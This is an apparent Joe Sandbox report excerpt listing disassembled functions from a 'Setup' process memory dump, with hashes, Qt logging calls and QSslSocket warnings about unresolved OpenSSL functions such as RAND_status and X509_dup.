                                                                                                                                                              • Opcode Fuzzy Hash: 1c007354df5a2a0466928218107a39510c5c0e2f905e3c497a404785e175a3f0
                                                                                                                                                              • Instruction Fuzzy Hash: 47F09AA5E0EA8281EBC3AB71E8112A53392AF84B10B409137DD6D4B321FE2CA0498E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A338B8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A338DD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A338F4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$RAND_status
                                                                                                                                                              • API String ID: 646154281-2320637098
                                                                                                                                                              • Opcode ID: e8d3e405caedfd7ac414d87b50f9881132c1ccbe88ecdcde53b388159867731e
                                                                                                                                                              • Instruction ID: 003a03743c1d7ea925bdcf47219d89e643d0d9f2842b5e733fa8e7bc7ca4f5a7
                                                                                                                                                              • Opcode Fuzzy Hash: e8d3e405caedfd7ac414d87b50f9881132c1ccbe88ecdcde53b388159867731e
                                                                                                                                                              • Instruction Fuzzy Hash: 01F090A5F0EA8281EBC3AB75E8112A47252BF84B20B409237ED6D4B361FE2C94558E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C68
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C8D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34CA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_get_ciphers
                                                                                                                                                              • API String ID: 646154281-1839667981
                                                                                                                                                              • Opcode ID: 8b397acbabce264cc303b5df56e52e47e575c9a1f64103e3664a05c23d309c8c
                                                                                                                                                              • Instruction ID: 1c0c4b295c13e79524410d2a893e52473e4f1b4936861fa49ca20d51f8e93044
                                                                                                                                                              • Opcode Fuzzy Hash: 8b397acbabce264cc303b5df56e52e47e575c9a1f64103e3664a05c23d309c8c
                                                                                                                                                              • Instruction Fuzzy Hash: 89F0B495F0EA9281EBC39B71E8012B53392BF84B10F408537DD6D8B721FE2CD0058E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33458
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A3347D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33494
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_DSA_PUBKEY$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1414460325
                                                                                                                                                              • Opcode ID: 60f43b254c411bfb565f3ab4d48a66edf47e73b04656fb165ac71c11eed6c3c0
                                                                                                                                                              • Instruction ID: 3e90d489aa4b725a82ce514c9f0e720b031bf447cd10d84f5d1e1672e4ba7484
                                                                                                                                                              • Opcode Fuzzy Hash: 60f43b254c411bfb565f3ab4d48a66edf47e73b04656fb165ac71c11eed6c3c0
                                                                                                                                                              • Instruction Fuzzy Hash: EBF0B499F0EA9281EBD39B71E8012A53392BF84B10F409037DD6D4B322FE2CE0458F00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C58
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C7D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C94
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$d2i_X509
                                                                                                                                                              • API String ID: 646154281-3355304157
                                                                                                                                                              • Opcode ID: b57f755d6fb5ea0b7d62026d068e5699f4ebe56bc6dde96c3cc9abd606cd4eca
                                                                                                                                                              • Instruction ID: b12243bb1200d5620820cc6aec1c7daa43263d080d15e41c969ab0275bfd9e44
                                                                                                                                                              • Opcode Fuzzy Hash: b57f755d6fb5ea0b7d62026d068e5699f4ebe56bc6dde96c3cc9abd606cd4eca
                                                                                                                                                              • Instruction Fuzzy Hash: 96F09095E0EA8281EBD39B71E8116B53392AF88B10B409137DD6D4A721FE2CA1458E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_dup
                                                                                                                                                              • API String ID: 646154281-2674687481
                                                                                                                                                              • Opcode ID: 92396b57c9a5ed5494a28b8dde66c2624e16c6e6e48755d94d6f5c1a29c19c01
                                                                                                                                                              • Instruction ID: 4fcc7ba31c63f9a3d37c6c7de8a38927d2a4fea5a7dbc946a1300fadd3fe8779
                                                                                                                                                              • Opcode Fuzzy Hash: 92396b57c9a5ed5494a28b8dde66c2624e16c6e6e48755d94d6f5c1a29c19c01
                                                                                                                                                              • Instruction Fuzzy Hash: 3BF09095F0FA9281EBC3AB71E8116A53792AF84B10B408037DD6D4B321FE2C95498F00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A333E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A3340D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A33424
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_DSAPrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-228587887
                                                                                                                                                              • Opcode ID: 51ae922b63f6e53e6c96b64fd716fb350d4e1baa21b4ae49e9e452016fb2d449
                                                                                                                                                              • Instruction ID: 3c0c32feec872cc0266817d04834718d8574c3d1a055b759b60e5abcf2394373
                                                                                                                                                              • Opcode Fuzzy Hash: 51ae922b63f6e53e6c96b64fd716fb350d4e1baa21b4ae49e9e452016fb2d449
                                                                                                                                                              • Instruction Fuzzy Hash: A4F09099F0E65281EF939B71E8122A52391BF84710F809033DD6D8B221EE2CD415CE00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A32C08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A32C2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A32C44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_init_ssl$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-4022273804
                                                                                                                                                              • Opcode ID: 79fffda076bb35a56d46c04dc43edced1435804281e7fb83af85fb60d4cd7ab7
                                                                                                                                                              • Instruction ID: 75b879ad58b3797c4fbd79a313bfd294305e5e20785c3753cfe5b16ed907a446
                                                                                                                                                              • Opcode Fuzzy Hash: 79fffda076bb35a56d46c04dc43edced1435804281e7fb83af85fb60d4cd7ab7
                                                                                                                                                              • Instruction Fuzzy Hash: C5F0B4A5F0EA8281EFC3AB71E8162B53392BF84B10B409037DD6E4B321FE2CD4058E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A32B98
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A32BBD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A32BD4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_init_crypto$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3686544713
                                                                                                                                                              • Opcode ID: f09f0557ba38b57d6af1488cedf3354918c99857f4d49e1ed0757553d1006ec2
                                                                                                                                                              • Instruction ID: 7c3a60f56d99c427384f0bad5c7cad9173a083cff0ea42adc223396a8e8f728c
                                                                                                                                                              • Opcode Fuzzy Hash: f09f0557ba38b57d6af1488cedf3354918c99857f4d49e1ed0757553d1006ec2
                                                                                                                                                              • Instruction Fuzzy Hash: EFF090A5E1EA8281EBC39B75E8116A53392AF84B10B408037DD6E4B321FE2CD4558E00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A36398
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A363BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A363D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_cmp
                                                                                                                                                              • API String ID: 646154281-406385445
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A31318
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A3133D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A31354
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: CRYPTO_get_ex_new_index$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-4194944823
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A30668
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A3068D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A306A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: ASN1_STRING_length$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1931847270
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E48
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E6D
